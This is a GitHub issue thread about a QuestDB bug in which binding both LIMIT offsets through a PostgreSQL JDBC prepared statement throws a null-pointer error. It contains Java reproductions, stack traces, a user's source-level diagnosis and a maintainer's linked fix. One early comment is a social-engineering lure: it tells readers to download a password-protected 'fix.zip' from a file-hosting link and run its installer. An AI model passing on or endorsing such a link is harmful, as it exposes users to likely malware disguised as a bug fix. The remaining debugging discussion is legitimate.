### ISSUE TITLE
Unable to paginate using PostgreSQL in Java code with QuestDB.

### ISSUE THREAD

**Issue by chaoxxx** [questdb/questdb#4894] opened 2024-08-26 10:04 UTC
### To reproduce

# env
|item|version|
|---|---|
|ubuntu|24.04|
|questdb|8.1.0|
|postgresql|42.2.25|

# How did I discover this issue?

I have a requirement to use the PostgreSQL driver in Java code to connect to QuestDB and query a single table with pagination. However, I found that QuestDB doesn't seem to work correctly and doesn't return paginated data as expected.

### the java code
```
public class QueryInQuestDB {
    public static void main(String[] args) throws SQLException {
        Connection connection = DriverManager.getConnection("jdbc:postgresql://192.168.182.165:8812/qdb", "admin", "admin");
        connection.setAutoCommit(false);
        String sql ="SELECT * from tt_1 where status = ? order by created_time desc limit ?,?";
        PreparedStatement preparedStatement = connection.prepareStatement(sql);
        preparedStatement.setInt(1,1);
        preparedStatement.setInt(2,10);
        preparedStatement.setInt(3,40);
        ResultSet resultSet = preparedStatement.executeQuery();
        while (resultSet.next()){
            String groupId = resultSet.getString("group_id");
            System.out.println("group_id:"+groupId);
        }
        preparedStatement.close();
        connection.close();
    }
}
```

### Error response message.
```
Exception in thread "main" org.postgresql.util.PSQLException: ERROR: Cannot invoke "io.questdb.griffin.engine.functions.constants.ConstantFunction.getLong(io.questdb.cairo.sql.Record)" because "defaultValue" is null
	at org.postgresql.core.v3.QueryExecutorImpl.receiveErrorResponse(QueryExecutorImpl.java:2565)
	at org.postgresql.core.v3.QueryExecutorImpl.processResults(QueryExecutorImpl.java:2297)
	at org.postgresql.core.v3.QueryExecutorImpl.execute(QueryExecutorImpl.java:322)
	at org.postgresql.jdbc.PgStatement.executeInternal(PgStatement.java:481)
	at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:401)
	at org.postgresql.jdbc.PgPreparedStatement.executeWithFlags(PgPreparedStatement.java:164)
	at org.postgresql.jdbc.PgPreparedStatement.executeQuery(PgPreparedStatement.java:114)
	at com.cosmo.questdb.QueryInQuestDB.main(QueryInQuestDB.java:18)
```

### Questdb log
[stdout-2024-08-26T09-57-04.txt](https://github.com/user-attachments/files/16747143/stdout-2024-08-26T09-57-04.txt)

### If I change the second parameter of `LIMIT` to be concatenated as a string

The following code runs successfully and returns the result I need.

```
public class QueryInQuestDB {
    public static void main(String[] args) throws SQLException {
        Connection connection = DriverManager.getConnection("jdbc:postgresql://192.168.182.165:8812/qdb", "admin", "quest");
        connection.setAutoCommit(false);
        String sql ="SELECT * from tt_1 where status = ? order by created_time desc limit ?,"+40;
        PreparedStatement preparedStatement = connection.prepareStatement(sql);
        preparedStatement.setInt(1,1);
        preparedStatement.setInt(2,10);
//        preparedStatement.setInt(3,40);
        ResultSet resultSet = preparedStatement.executeQuery();
        while (resultSet.next()){
            String groupId = resultSet.getString("group_id");
            System.out.println("group_id:"+groupId);
        }
        preparedStatement.close();
        connection.close();
    }
}
```

### QuestDB version:

8.1.0

### OS, in case of Docker specify Docker and the Host OS:

Ubuntu24.04

### File System, in case of Docker specify Host File System:

ext4

### Full Name:

chao

### Affiliation:

zhuc@jointsky.com

### Have you followed Linux, MacOs kernel configuration steps to increase Maximum open files and Maximum virtual memory areas limit?

- [X] Yes, I have

**Comment by Wanderx13** [comment] 2024-08-26 10:04
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ilkou** [comment] 2024-08-26 19:35
I have the same error (using `JdbcTemplate` and also with `JdbcClient`, in a `spring boot` app)

```console
Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [Request processing failed: org.springframework.jdbc.UncategorizedSQLException: PreparedStatementCallback; uncategorized SQLException for SQL [SELECT * FROM geo_positions WHERE ts BETWEEN ? AND ?
LIMIT ?,?
]; SQL state [00000]; error code [0]; ERROR: Cannot invoke "io.questdb.griffin.engine.functions.constants.ConstantFunction.getLong(io.questdb.cairo.sql.Record)" because "defaultValue" is null] with root cause

org.postgresql.util.PSQLException: ERROR: Cannot invoke "io.questdb.griffin.engine.functions.constants.ConstantFunction.getLong(io.questdb.cairo.sql.Record)" because "defaultValue" is null
	at org.postgresql.core.v3.QueryExecutorImpl.receiveErrorResponse(QueryExecutorImpl.java:2725) ~[postgresql-42.7.3.jar:42.7.3]
	at org.postgresql.core.v3.QueryExecutorImpl.processResults(QueryExecutorImpl.java:2412) ~[postgresql-42.7.3.jar:42.7.3]
	at org.postgresql.core.v3.QueryExecutorImpl.execute(QueryExecutorImpl.java:371) ~[postgresql-42.7.3.jar:42.7.3]
	at org.postgresql.jdbc.PgStatement.executeInternal(PgStatement.java:502) ~[postgresql-42.7.3.jar:42.7.3]
	at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:419) ~[postgresql-42.7.3.jar:42.7.3]
	at org.postgresql.jdbc.PgPreparedStatement.executeWithFlags(PgPreparedStatement.java:194) ~[postgresql-42.7.3.jar:42.7.3]
	at org.postgresql.jdbc.PgPreparedStatement.executeQuery(PgPreparedStatement.java:137) ~[postgresql-42.7.3.jar:42.7.3]
	at com.zaxxer.hikari.pool.ProxyPreparedStatement.executeQuery(ProxyPreparedStatement.java:52) ~[HikariCP-5.1.0.jar:na]
	at com.zaxxer.hikari.pool.HikariProxyPreparedStatement.executeQuery(HikariProxyPreparedStatement.java) ~[HikariCP-5.1.0.jar:na]
	at org.springframework.jdbc.core.JdbcTemplate$1.doInPreparedStatement(JdbcTemplate.java:732) ~[spring-jdbc-6.1.12.jar:6.1.12]
	at org.springframework.jdbc.core.JdbcTemplate.execute(JdbcTemplate.java:658) ~[spring-jdbc-6.1.12.jar:6.1.12]
	at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:723) ~[spring-jdbc-6.1.12.jar:6.1.12]
	at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:754) ~[spring-jdbc-6.1.12.jar:6.1.12]
	at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:767) ~[spring-jdbc-6.1.12.jar:6.1.12]
	at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:825) ~[spring-jdbc-6.1.12.jar:6.1.12]
```

maybe the return format is not the same as normal PostgreSQL queries, so it requires different response parsing 🤔

**Comment by chaoxxx** [comment] 2024-08-27 03:58
I seem to have found the cause of the issue , in version tag 8.1.0.

In the `io.questdb.griffin.SqlCodeGenerator` file, at line 5492, a null is passed to the defaultValue of `toLimitFunction`, which causes a null pointer issue at line 5803.

```
    @Nullable
    private Function getHiFunction(QueryModel model, SqlExecutionContext executionContext) throws SqlException {
        return toLimitFunction(executionContext, model.getLimitHi(), null);
    }
```

```
    private Function toLimitFunction(
            SqlExecutionContext executionContext,
            ExpressionNode limit,
            ConstantFunction defaultValue
    ) throws SqlException {
        if (limit == null) {
            return defaultValue;
        }

        final Function func = functionParser.parseFunction(limit, EmptyRecordMetadata.INSTANCE, executionContext);
        final int type = func.getType();
        if (limitTypes.excludes(type)) {
            if (type == ColumnType.UNDEFINED) {
                if (func instanceof IndexedParameterLinkFunction) {
                    executionContext.getBindVariableService().setLong(((IndexedParameterLinkFunction) func).getVariableIndex(), defaultValue.getLong(null));
                    return func;
                }

                if (func instanceof NamedParameterLinkFunction) {
                    executionContext.getBindVariableService().setLong(((NamedParameterLinkFunction) func).getVariableName(), defaultValue.getLong(null));
                    return func;
                }
            }
            throw SqlException.$(limit.position, "invalid type: ").put(ColumnType.nameOf(type));
        }
        return func;
    }
```

I tried changing the code at line 5492 to the following.

```
    @Nullable
    private Function getHiFunction(QueryModel model, SqlExecutionContext executionContext) throws SqlException {
        return toLimitFunction(executionContext, model.getLimitHi(), LongConstant.NULL);
    }
```

it works,The previous error no longer occurs.
However, a few minutes later, I discovered a new issue. No matter how I modify the parameter values after the `LIMIT` keyword, it always returns the same result.
This is really an interesting thing.Do you have any good ideas?

**Comment by chaoxxx** [comment] 2024-08-27 04:05
> I have the same error (using `JdbcTemplate` and also with `JdbcClient`, in a `spring boot` app)
> 
> ```
> Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [Request processing failed: org.springframework.jdbc.UncategorizedSQLException: PreparedStatementCallback; uncategorized SQLException for SQL [SELECT * FROM geo_positions WHERE ts BETWEEN ? AND ?
> LIMIT ?,?
> ]; SQL state [00000]; error code [0]; ERROR: Cannot invoke "io.questdb.griffin.engine.functions.constants.ConstantFunction.getLong(io.questdb.cairo.sql.Record)" because "defaultValue" is null] with root cause
> 
> org.postgresql.util.PSQLException: ERROR: Cannot invoke "io.questdb.griffin.engine.functions.constants.ConstantFunction.getLong(io.questdb.cairo.sql.Record)" because "defaultValue" is null
> 	at org.postgresql.core.v3.QueryExecutorImpl.receiveErrorResponse(QueryExecutorImpl.java:2725) ~[postgresql-42.7.3.jar:42.7.3]
> 	at org.postgresql.core.v3.QueryExecutorImpl.processResults(QueryExecutorImpl.java:2412) ~[postgresql-42.7.3.jar:42.7.3]
> 	at org.postgresql.core.v3.QueryExecutorImpl.execute(QueryExecutorImpl.java:371) ~[postgresql-42.7.3.jar:42.7.3]
> 	at org.postgresql.jdbc.PgStatement.executeInternal(PgStatement.java:502) ~[postgresql-42.7.3.jar:42.7.3]
> 	at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:419) ~[postgresql-42.7.3.jar:42.7.3]
> 	at org.postgresql.jdbc.PgPreparedStatement.executeWithFlags(PgPreparedStatement.java:194) ~[postgresql-42.7.3.jar:42.7.3]
> 	at org.postgresql.jdbc.PgPreparedStatement.executeQuery(PgPreparedStatement.java:137) ~[postgresql-42.7.3.jar:42.7.3]
> 	at com.zaxxer.hikari.pool.ProxyPreparedStatement.executeQuery(ProxyPreparedStatement.java:52) ~[HikariCP-5.1.0.jar:na]
> 	at com.zaxxer.hikari.pool.HikariProxyPreparedStatement.executeQuery(HikariProxyPreparedStatement.java) ~[HikariCP-5.1.0.jar:na]
> 	at org.springframework.jdbc.core.JdbcTemplate$1.doInPreparedStatement(JdbcTemplate.java:732) ~[spring-jdbc-6.1.12.jar:6.1.12]
> 	at org.springframework.jdbc.core.JdbcTemplate.execute(JdbcTemplate.java:658) ~[spring-jdbc-6.1.12.jar:6.1.12]
> 	at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:723) ~[spring-jdbc-6.1.12.jar:6.1.12]
> 	at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:754) ~[spring-jdbc-6.1.12.jar:6.1.12]
> 	at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:767) ~[spring-jdbc-6.1.12.jar:6.1.12]
> 	at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:825) ~[spring-jdbc-6.1.12.jar:6.1.12]
> ```
> 
> maybe the return format is not the same as normal PostgreSQL queries, so it requires different response parsing 🤔

It looks like we're encountering the same issue. This isn't a problem with the PostgreSQL driver parsing; the database logs show that this is an error occurring within the database.

**Comment by glasstiger** [comment] 2024-08-27 13:35
Hi @chaoxxx , changing `null` to `LongConstant.NULL` is probably the fix, just about to test it.

What do you mean exactly by "No matter how I modify the parameter values after the `LIMIT` keyword, it always returns the same result"?
Are you running the PreparedStatement more times after each other with different parameters, and it returns the same result?
Tried that, and seems to work for me.
Do you have example code for this issue too?

**Comment by chaoxxx** [comment] 2024-08-28 07:28
Hi @glasstiger ,Thank you for your prompt response.

After attempting to fix the null pointer issue using the method shown above, I discovered the following new problem.

```
public class QueryInQuestDB {
    public static void main(String[] args) throws SQLException {
        Connection connection = DriverManager.getConnection("jdbc:postgresql://192.168.7.119:8812/qdb", "admin", "quest");
        connection.setAutoCommit(false);
        String sql ="SELECT * from tt_1 where status = ? order by created_time desc limit ?,?";
        PreparedStatement preparedStatement = connection.prepareStatement(sql);
        int status = 0;
        int limitLo = 0;
        int limitHi = 1;
        System.out.println(String.format("status is %d,limitLo is %d,limitHi is %d", status,limitLo,limitHi));
        preparedStatement.setInt(1,status);
        preparedStatement.setInt(2,limitLo);
        preparedStatement.setInt(3,limitHi);
        ResultSet resultSet = preparedStatement.executeQuery();
        while (resultSet.next()){
            String groupId = resultSet.getString("group_id");
            System.out.println("group_id:"+groupId);
        }
        preparedStatement.close();
        connection.close();
    }
}
```

![第一次查询](https://github.com/user-attachments/assets/da2252a1-193a-468f-9059-01c66a14e403)

![通过web第一次查询](https://github.com/user-attachments/assets/517810bf-2218-4859-852f-9ced2c555e2c)

The result returned by the console after running the above code is consistent with the result obtained through a web browser query.

It seems useful. 

However, when I changed the `limitHi` variable to 10, I expected 10 records to be returned, but strangely, after running the program, only 1 record was returned. However, the same SQL executed in a web browser successfully returned 10 records.


```
public class QueryInQuestDB {
    public static void main(String[] args) throws SQLException {
        Connection connection = DriverManager.getConnection("jdbc:postgresql://192.168.7.119:8812/qdb", "admin", "quest");
        connection.setAutoCommit(false);
        String sql ="SELECT * from tt_1 where status = ? order by created_time desc limit ?,?";
        PreparedStatement preparedStatement = connection.prepareStatement(sql);
        int status = 0;
        int limitLo = 0;
        int limitHi = 10;
        System.out.println(String.format("status is %d,limitLo is %d,limitHi is %d", status,limitLo,limitHi));
        preparedStatement.setInt(1,status);
        preparedStatement.setInt(2,limitLo);
        preparedStatement.setInt(3,limitHi);
        ResultSet resultSet = preparedStatement.executeQuery();
        while (resultSet.next()){
            String groupId = resultSet.getString("group_id");
            System.out.println("group_id:"+groupId);
        }
        preparedStatement.close();
        connection.close();
    }
}
```

![第二次查询](https://github.com/user-attachments/assets/95a1c48f-02f7-4b73-8314-1bcd0813d073)

![通过web第二次查询](https://github.com/user-attachments/assets/b66a4422-a57b-4082-a46d-88dbbaf7f24b)


After that, I tried changing the `limitLo` and `limitHi` variables to other values, but after the program finished running, it still only returned 1 value, and this value always remains the same.

It seems like this might be related to caching. 😄 

![image](https://github.com/user-attachments/assets/74b0e628-97ec-4e79-879a-97b56345b79b)

**Comment by glasstiger** [comment] 2024-08-28 13:58
Hi @chaoxxx , I am unable to reproduce the caching issue.
Running a very very similar code, and I am always getting the expected result from the query.
This is my test client:
```
import java.sql.*;

public class Main {
    public static void main(String[] args) throws SQLException {
        String dbURL = "jdbc:postgresql://localhost:8812/qdb";
        Connection conn = DriverManager.getConnection(dbURL, "admin", "quest");
        conn.setAutoCommit(false);
        String sql = "SELECT * from cpu where rack = ? order by timestamp desc limit ?,?";
        PreparedStatement stmt = conn.prepareStatement(sql);
        int rack = 6;
        int limitLo = 0;
        int limitHi = 15;
        System.out.printf("rack is %d, limitLo is %d, limitHi is %d%n", rack, limitLo, limitHi);
        stmt.setInt(1, rack);
        stmt.setInt(2, limitLo);
        stmt.setInt(3, limitHi);
        ResultSet rs = stmt.executeQuery();
        while (rs.next()) {
            String strField = rs.getString("usage_user");
            System.out.println(strField);
        }
        stmt.close();
        conn.close();
    }
}
```

Could you try it again with the latest fix, please?
The PR with the fix is https://github.com/questdb/questdb/pull/4896.
Alternatively, you can wait until it gets merged, and try to run your client code against master.
Thank you.

**Closed** 2024-08-28 18:15 UTC
Labels: Bug, Postgres Wire
